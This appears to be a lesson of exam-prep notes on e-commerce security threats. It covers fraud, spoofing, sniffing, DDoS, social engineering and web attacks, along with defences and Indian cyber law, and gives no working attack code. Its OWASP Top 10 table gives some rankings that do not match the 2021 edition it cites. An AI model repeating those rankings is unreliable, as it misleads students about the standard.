4.1 Security Threats in E-Commerce
E-commerce sites are prime targets for cyberattackers because they handle:
- Money (credit cards, bank credentials)
- Personal data (name, address, phone)
- Trust signals (login credentials, OTPs)
The CIA Triad — security goals
Every e-commerce security mechanism aims at one of three goals (the CIA Triad):
| Goal | Meaning | Example Attack |
|---|---|---|
| Confidentiality | Data stays private | Eavesdropping, sniffing |
| Integrity | Data not altered in transit | Man-in-the-middle, tampering |
| Availability | System stays accessible | DoS / DDoS |
Plus three more (the Extended Triad for commerce):
| Goal | Meaning | Example Attack |
|---|---|---|
| Authenticity | Sender / receiver verified | Spoofing, phishing |
| Authorisation | Acting party has permission | Privilege escalation |
| Non-repudiation | Sender cannot deny later | Forged signatures |
---
Categories of Security Threats
| Category | Examples |
|---|---|
| Cybercrimes | Hacking, malware, ransomware |
| Fraud | Credit card fraud, identity theft, phishing |
| Network attacks | Spoofing, sniffing, DoS, DDoS, MITM |
| Application attacks | SQL injection, XSS, CSRF |
| Insider threats | Malicious employees, accidental leaks |
| Physical | Theft of hardware, device loss |
---
1. Cybercrimes — broad category
Any criminal activity involving a computer or network. Includes:
| Crime | Description | Indian Law |
|---|---|---|
| Hacking | Unauthorised access | IT Act 2000 §66 (3-year imprisonment, ₹5 lakh fine) |
| Identity theft | Stealing identity for fraud | §66C |
| Cyberstalking | Repeated harassment online | §354D IPC |
| Cyberterrorism | Attacks on critical infra | §66F (life imprisonment) |
| Data theft | Stealing data | §66B |
| Defamation | False online statements | §499 IPC |
| Obscene content | Distributing obscene material | §67 IT Act |
| Phishing | Fake login pages to steal credentials | §66D |
| Online gambling | Illegal in most states | State acts |
Famous Indian cybercrime cases
- AIIMS Delhi ransomware (2022) — 15 days outage, allegedly Chinese-origin
- Maharashtra eSeva fraud (2018) — ₹76 crore stolen via fake portals
- Cosmos Bank heist (2018) — ₹94 crore lost in coordinated ATM withdrawals globally
- Mumbai Westside fraud (2016) — Hong Kong-based attackers cleared ₹100 crore
---
2. Credit Card Fraud / Theft
Common credit card frauds
| Fraud | Description |
|---|---|
| Skimming | Device on ATM/POS captures magnetic stripe |
| Phishing | Fake bank email asks for CVV / OTP |
| Vishing | Phone call impersonating bank |
| Smishing | SMS phishing |
| Card cloning | Magnetic stripe data copied to fake card |
| Card-Not-Present (CNP) fraud | Stolen card details used online |
| Account takeover | Login credentials hijacked → cards added |
| Friendly fraud | Customer disputes legit transaction (chargeback abuse) |
| Application fraud | Fake application with stolen identity |
| First-party fraud | Customer never intended to pay |
Mitigation
- EMV chip — replaces magnetic stripe (cloning much harder)
- 3D Secure / OTP — for online transactions
- CVV — never store at merchant (PCI-DSS)
- Tokenisation — actual card never seen by merchant
- Fraud detection ML — pattern recognition (unusual location, amount)
- Velocity checks — too many txns in short time → flag
- Geolocation — txn from unusual country → flag
- Device fingerprinting — track device characteristics
---
3. Identity Fraud
Identity fraud = unauthorised use of someone's personal information for criminal/financial gain.
Common identity fraud techniques
| Technique | How it Works |
|---|---|
| Phishing | Email with fake login page |
| Vishing | Phone call asking for OTP |
| Smishing | SMS phishing |
| Pharming | DNS poisoning redirects to fake site |
| Data breach | Stolen credentials from compromised DB |
| Social engineering | Trick employee into revealing info |
| Dumpster diving | Discarded documents with PII |
| Aadhaar misuse | Linked-account takeover |
Defences
- Multi-factor authentication
- Email/SMS alerts on changes
- Credit freeze (US has it; India doesn't easily)
- CIBIL alerts for new credit applications
- Don't share OTPs (banks never ask)
---
4. Spoofing
Spoofing = pretending to be someone you're not.
| Type | Description |
|---|---|
| Email spoofing | Forge "From" header |
| IP spoofing | Forge source IP address in packets |
| MAC spoofing | Forge hardware address |
| DNS spoofing / DNS poisoning | Redirect domain to attacker's server |
| Caller ID spoofing | Show wrong number on caller display |
| Website spoofing | Fake site mimicking real (HDFC.com vs HDFCBank.com) |
| GPS spoofing | Fake GPS coordinates |
| ARP spoofing | Send fake ARP messages on local network |
Defences
- DNS over HTTPS / DNSSEC
- Email auth (SPF, DKIM, DMARC)
- VPN
- URL inspection before clicking
- Multi-factor auth
- HTTPS everywhere
---
5. Sniffing
Sniffing (also eavesdropping, packet capture) = intercepting network traffic to read its contents.
Types
Sniffing comes in several flavours. Passive sniffing works on legacy hub-based networks where every packet is broadcast to every device — the sniffer just listens, no manipulation needed. Active sniffing is the modern variant: on switched networks (where each port gets only its own traffic), the attacker uses ARP poisoning to trick neighbouring devices into routing through the attacker. Wireless sniffing captures Wi-Fi packets out of the air — easier on open or WEP networks, much harder on WPA2/3. MITM (Man-in-the-Middle) is the active form of sniffing where the attacker positions themselves between two parties, reads everything, and can also tamper with messages. SSL stripping is a particularly nasty MITM technique where the attacker downgrades an HTTPS connection to plain HTTP and the victim's browser, if not configured strictly, may not notice.
Tools (used by both attackers and pen-testers)
- Wireshark — packet analysis
- tcpdump — command-line packet capture
- Ettercap — MITM toolkit
- Bettercap — modern MITM tool
Defences
- HTTPS — encrypts traffic (more in next lesson)
- VPN — encrypts everything in tunnel
- WPA2/3 WiFi — strong wireless encryption
- Avoid public WiFi for sensitive transactions
- Certificate pinning in apps
---
6. DoS and DDoS Attacks
DoS (Denial of Service) = make a system unavailable to legitimate users. DDoS (Distributed DoS) = many machines flood the target simultaneously.
Types
DoS/DDoS attacks fall into four broad categories. Volumetric attacks simply flood the target's bandwidth so legitimate traffic cannot reach it — UDP floods and ICMP floods are textbook examples; they are measured in Gbps or Tbps. Protocol attacks target the server's finite resources for protocol state — the classic SYN flood opens half-open TCP connections faster than the server can close them; "Ping of Death" used malformed ICMP packets to crash older stacks. Application-layer attacks look like legitimate traffic but are designed to exhaust application threads — Slowloris holds HTTP connections open by sending headers very slowly; HTTP flood pounds expensive endpoints (search, login) until the app server saturates. Amplification attacks are the most cost-efficient for attackers: a small spoofed request to a public service (DNS, NTP, memcached) generates a much larger response that gets directed at the victim — a 1 Gbps attacker can produce 50–500 Gbps of inbound flood.
Famous DDoS incidents
| Year | Target | Magnitude |
|---|---|---|
| 2016 | Dyn DNS | Took down Twitter, Netflix, Spotify; ~1 Tbps |
| 2018 | GitHub | 1.35 Tbps (memcached amplification) |
| 2020 | AWS | 2.3 Tbps |
| 2022 | Google Cloud | 46 million RPS |
| 2023 | Cloudflare | 71 million RPS |
Defences
| Defence | How it Helps |
|---|---|
| CDN / Anti-DDoS service | Cloudflare, AWS Shield, Akamai filter at edge |
| Rate limiting | Cap requests per IP/user |
| CAPTCHA | Differentiate human vs bot |
| Geoblocking | Block traffic from regions you don't serve |
| Load balancing + auto-scaling | Absorb the load |
| DDoS scrubbing | Specialised filtering services |
| BGP blackhole | Drop attacker's IP at ISP level |
---
7. Social Engineering
The human element — tricking people instead of breaking technology.
| Technique | Description |
|---|---|
| Phishing | Fake email with malicious link |
| Spear phishing | Targeted at specific person |
| Whaling | Targeted at executives |
| Pretexting | Pose as authority (HR, IT) |
| Baiting | USB drives in parking lot |
| Tailgating | Follow employee through secure door |
| Quid pro quo | "I'll help you in exchange for credentials" |
Famous social engineering attacks
- Kevin Mitnick — pioneered the technique
- Twitter hack 2020 — 130 high-profile accounts (Obama, Musk, Apple) compromised via social engineering of Twitter employees
- Indian SIM-swap frauds — telecom employee tricked into porting victim's number
Defences
- Security awareness training
- Verify via second channel before acting on email
- Don't trust authority claims in unsolicited contact
- Banks don't ask for OTP (memorise this)
- Look at full URL before entering credentials
---
8. Application-Layer Attacks
| Attack | Description | OWASP Top 10? |
|---|---|---|
| SQL Injection | Inject SQL via input fields | #3 (2021) |
| XSS (Cross-Site Scripting) | Inject JS into pages others view | #3 (2021) Injection |
| CSRF (Cross-Site Request Forgery) | Trick user into unwanted action on logged-in site | #5 |
| Insecure Deserialization | Exploit unsafe input parsing | #8 |
| Broken Access Control | Access pages/data you shouldn't | #1 |
| Sensitive Data Exposure | Expose data via misconfig | #2 (Crypto Failures) |
| XXE (XML External Entities) | Exploit XML parsers | Subset of #3 |
| SSRF (Server-Side Request Forgery) | Make server fetch attacker-controlled URL | #10 |
Famous app-attack incidents
- Equifax (2017) — 147 million records via Apache Struts vulnerability
- British Airways (2018) — JS supply-chain attack, 500K customers exposed
- Magecart attacks (ongoing) — JS-injection on e-commerce sites siphons card data
---
Key Terms — Lesson 4.1
Security has its own dense vocabulary. The terms below cover the threats catalogued in this lesson and the conceptual frameworks an examiner expects you to invoke.
CIA Triad — The classic information-security framework: Confidentiality (data stays private), Integrity (data is not altered), Availability (system stays usable). Every security control maps to one or more legs of the triad. The extended triad adds Authenticity (parties are who they claim to be), Authorisation (parties can do what they're attempting), and Non-repudiation (a sender cannot later deny their action).
Cybercrime — Any criminal activity that uses or targets a computer or network. In India, the IT Act 2000 (with 2008 amendments) is the primary statute, supplemented by the IPC for related offences. Section 66 covers hacking and data theft; 66C identity theft; 66D phishing; 66F cyberterrorism (life imprisonment); 67 obscene content.
Hacking — Unauthorised access to a computer or network. Section 66 of the IT Act prescribes up to 3 years' imprisonment and ₹5 lakh fine. "Ethical hacking" (penetration testing with the owner's consent) is legal and a recognised profession.
Identity Theft — Stealing someone's personal identifiers (Aadhaar number, PAN, bank credentials, OTP, biometric) and using them to commit fraud. Covered under Section 66C of the IT Act. Common in India through SIM-swap, phishing, fake KYC calls, and document misuse.
Phishing — Deceptive communication (usually email or a fake website) that impersonates a trusted entity to trick the victim into revealing credentials, OTPs, or card data. Variants include spear phishing (targeted at a specific individual), whaling (targeted at C-level executives), vishing (voice phishing — phone call), smishing (SMS phishing), and angler phishing (fake customer-support handles on social media).
Pharming — A more sophisticated cousin of phishing where the attacker poisons DNS (locally on the victim's device or upstream at the resolver) so that even typing the correct URL leads to a fake site. Pharming is harder to detect because the URL bar shows the legitimate domain.
Skimming — Physical capture of card data using a device illegally attached to an ATM card slot or a POS terminal. The skimmer reads the magnetic stripe; a tiny camera or PIN-pad overlay captures the PIN. EMV chip cards have largely killed traditional skimming, though "shimming" (chip-level skimmers) is the new variant.
Card-Not-Present (CNP) Fraud — Fraudulent use of stolen card data in an online context, where the physical card is not required. 3D Secure / OTP, tokenisation, and fraud-detection ML are the main defences.
Account Takeover (ATO) — When an attacker gains control of a user's e-commerce or banking account — through credential stuffing, phishing, SIM-swap, or password reuse — and then drains the linked payment method, redirects deliveries, or sells the account on the dark web.
Friendly Fraud / Chargeback Abuse — When a legitimate customer disputes a real transaction with their card issuer (claiming "I didn't authorise this" or "I didn't receive the goods"), pocketing both the product and the refund. Merchants fight friendly fraud with delivery proofs, signature capture, and chargeback-arbitration tools.
Spoofing — A class of attacks where the attacker forges identity information at some protocol level. Email spoofing forges the From header; IP spoofing forges source IP; DNS spoofing / poisoning redirects a domain to the attacker's server; website spoofing uses look-alike URLs (hdfcbank-secure.com); caller-ID spoofing displays a fake calling number; ARP spoofing is used inside MITM attacks on local networks.
Sniffing / Packet Capture — Intercepting network packets to read their contents. Passive sniffing just listens; active sniffing uses ARP poisoning or rogue access points. Tools include Wireshark, tcpdump, Ettercap, and Bettercap. The primary defence is end-to-end encryption (HTTPS, VPN).
Man-in-the-Middle (MITM) — An active interception attack where the attacker sits between the two communicating parties, reading and potentially modifying the traffic. MITM requires either compromised infrastructure (rogue Wi-Fi, ARP poisoning) or a successful spoofing primitive (DNS, IP). TLS certificate validation is the primary defence; certificate pinning hardens it further.
SSL Stripping — A MITM technique where the attacker downgrades the victim's intended HTTPS connection to plain HTTP, then forwards the (now visible) traffic to the real server over HTTPS. Modern browsers warn aggressively against HTTP-only sites for this reason; HSTS (HTTP Strict Transport Security) headers tell the browser "always HTTPS for this domain".
Denial of Service (DoS) — An attack that makes a system unavailable to legitimate users. DoS uses one machine; DDoS (Distributed DoS) uses thousands or millions, usually a botnet of compromised devices.
DDoS (Distributed DoS) — A coordinated DoS attack from many machines. Four main categories: volumetric (bandwidth flood), protocol (resource exhaustion — SYN flood, Ping of Death), application-layer (Slowloris, HTTP flood), and amplification (DNS, NTP, memcached reflection). The largest publicly disclosed DDoS attacks (Cloudflare 2023, Google 2022) have peaked at tens of millions of requests per second and 2+ Tbps.
Amplification / Reflection Attack — A DDoS technique where the attacker sends a small spoofed request (with the victim's IP as the source) to a public service (open DNS resolver, NTP server, memcached) that returns a much larger response — multiplying the attacker's bandwidth by 50× to 50,000×.
Social Engineering — Manipulating a human into performing an action or revealing information they should not. Variants include phishing, pretexting (pose as authority — "this is HR, share your password"), baiting (drop infected USB drives), tailgating (follow someone through a secure door), and quid pro quo ("I'll help you in exchange for your credentials"). Kevin Mitnick was the most famous practitioner; modern attacks frequently start with social engineering before any technical exploit.
SIM Swap Fraud — A growing Indian threat: the attacker uses social engineering (or an inside helper at the telecom) to get the victim's mobile number transferred to a SIM the attacker controls. Once they own the number, they receive every OTP — for banks, wallets, exchanges — and can drain accounts within hours.
SQL Injection (SQLi) — An application-level attack where the attacker injects malicious SQL fragments into an input that gets concatenated into a database query. Properly parameterised queries (prepared statements) eliminate this class of vulnerability. SQLi remains one of the OWASP Top 10 a quarter-century after it was first described, because so much new code still gets it wrong.
Cross-Site Scripting (XSS) — An attack where the attacker injects JavaScript into a page that gets executed in another user's browser — letting the attacker steal cookies, hijack sessions, or perform actions on the victim's behalf. Three sub-types: stored (script saved in DB), reflected (script in URL), and DOM-based (entirely client-side). The defence is consistent output encoding plus Content-Security-Policy headers.
Cross-Site Request Forgery (CSRF) — An attack that tricks a victim's browser into sending an authenticated request to a site they're logged into ("transfer ₹50,000 to attacker's account") without the victim's knowledge. The defence is CSRF tokens and SameSite cookies.
Broken Access Control — Number 1 on the OWASP Top 10 (2021): users can access data or actions they should not be allowed to — by guessing URLs, manipulating request IDs, or escalating privileges. The defence is enforcing authorisation on the server for every action, not just hiding UI elements on the client.
Insider Threat — A security risk originating from someone with legitimate access — a current employee, contractor, or former employee whose credentials still work. Insider threats can be malicious (deliberate data theft) or negligent (lost laptop, accidentally emailed file). Most data breaches involve some insider element, even if the attacker is external.
IT Act 2000 — India's primary statute governing electronic commerce and cybercrime. It legally recognises electronic records and digital signatures, sets the rules for intermediary liability, and codifies most cyber-offences (hacking, identity theft, phishing, cyberterrorism, obscene content). Amended in 2008 to address newer offences.
DPDP Act 2023 (Digital Personal Data Protection Act) — India's comprehensive data-protection law (enacted 2023). It defines the rights of Data Principals (citizens), obligations of Data Fiduciaries (companies processing data), the role of the Data Protection Board, and penalties of up to ₹250 crore for serious breaches. DPDP applies to anyone processing personal data of Indians, even from outside India.
---
Study deep
- The attack surface is huge. A typical e-commerce site has 100+ endpoints, dozens of third-party scripts, hundreds of vendors. Each is a potential attack vector. Security is layered, not absolute.
- Insider threats are underestimated. Most data breaches involve insider negligence or malice. Phishing of employees → external attack is the most common pattern.
- The cost of a breach is high. Average data breach cost: ~$4.5 million globally; lower in India (~₹13 crore) but rising. Brand damage, customer churn, regulatory fines (GDPR up to 4% of global revenue) add to it.
- Compliance is necessary but not sufficient. PCI-DSS, ISO 27001, SOC 2 — compliance doesn't equal security. Many breached companies were compliant on paper.
- Security is a shared responsibility. Customer ↔ Merchant ↔ Payment gateway ↔ Card network. Each must do their part. RBI's 2-factor auth mandate, PCI-DSS for merchants, EMV for cards — all cooperative layers.
PYQ pattern (very common): "Discuss security threats in e-commerce." — Categorise (cybercrime, fraud, network, app, insider); list 6-8 specific threats (phishing, spoofing, sniffing, DoS, MITM, identity theft, SQL injection, social engineering); explain 2-3 with examples.
PYQ pattern: "What is DoS / DDoS attack? Explain its types and defences." — Define DoS vs DDoS; 4 types (volumetric, protocol, app-layer, amplification); 5 defences (CDN, rate-limit, CAPTCHA, scrubbing, auto-scale).